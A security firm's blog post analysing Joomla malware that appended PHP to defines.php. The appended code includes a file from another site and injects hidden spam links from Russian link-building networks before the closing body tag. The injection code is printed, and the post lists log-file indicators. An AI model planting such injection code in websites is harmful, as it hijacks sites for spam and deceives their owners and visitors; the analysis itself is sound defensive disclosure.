We found some interesting Joomla malware this week, where Joomla’s /includes/defines.php file had this code appended to it:

define('DZR', base64_decode('QzovaW5l[REDACTED]5waHA='));
if ( file_exists (DZR) ) { ob_start(); require_once(DZR); ob_end_clean(); } if ( !defined('RSLT') ) define('RSLT', '');
ob_start("callbck"); function callbck($buff_obs) { if ( defined('DZTR') ) return DZTR;
if ( defined('NIND') ) { $buff_obs = ereg_replace("href=\"http", "href=\"_http", $buff_obs);
$buff_obs = ereg_replace("href='http", "href='_http", $buff_obs);
$buff_obs = ereg_replace("href=http", "href=_http", $buff_obs);
$buff_obs = ereg_replace("_http://".NIND, "http://".NIND, $buff_obs);}
return (ereg_replace("</body>", RSLT."\n</body>", $buff_obs)); }

The first line defines a variable “DZR” as “C:/inetpub/wwwroot/[REDACTED]/modules/mod_banners/tmpl/helper.php”.  This was on a Windows server running multiple Joomla sites, and DZR, pointed to a file helper.php within a different site.  Several other sites on the server also had their defines.php infected with code pointing to this same helper.php.

The rest of the code basically runs helper.php and looks for a variable call “RSLT” (result) to append just before the closing “</body>” tag of pages on the infected site.  So what does helper.php do?

//Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar

We deobfuscated the code enough to find out.  It contains some basic backdoor code, but its main function is to check a bunch of variables and then display links obtained from one of the following Russian link-building networks:

  • linkfeed.ru
  • sape.ru
  • trustlink.ru
  • xap.ru
  • proflinks.net


It keeps track of what has been displayed via several log files, and it will contact external servers to obtain fresh links.  It assembles code around the links (sometimes hidden with Javascript setting the display property to “none”) and  returns it to Joomla via the RSLT variable.  It stores the log files in a temporary directory on the server, in this case “C:/tmp/tmp_server”.  The files would have these names:

  • sess_fc.log
  • sess_fs.log
  • sess_nssp.log
  • sess_nslf.log
  • sess_nstl.log
  • sess_nsxp.log
  • sess_nspl.log
  • sess_fssp.log
  • sess_fslf.log
  • sess_fstl.log
  • sess_fsxp.log
  • sess_fspl.log
  • sess_tr.log
  • sess_(l|s|t|x|p)(32 hex characters)


The links seem to be pretty standard spam – online pharmacies, online casinos, payday loans, etc.  Though the link networks are Russian, the spam can be in English or potentially any language.  The purpose of the links is to fraudulently build up their targets in search engine results by having a variety of sites link to them.

If you think your site is infected with this or any malicious code, you can always contact us and get help taking care of it.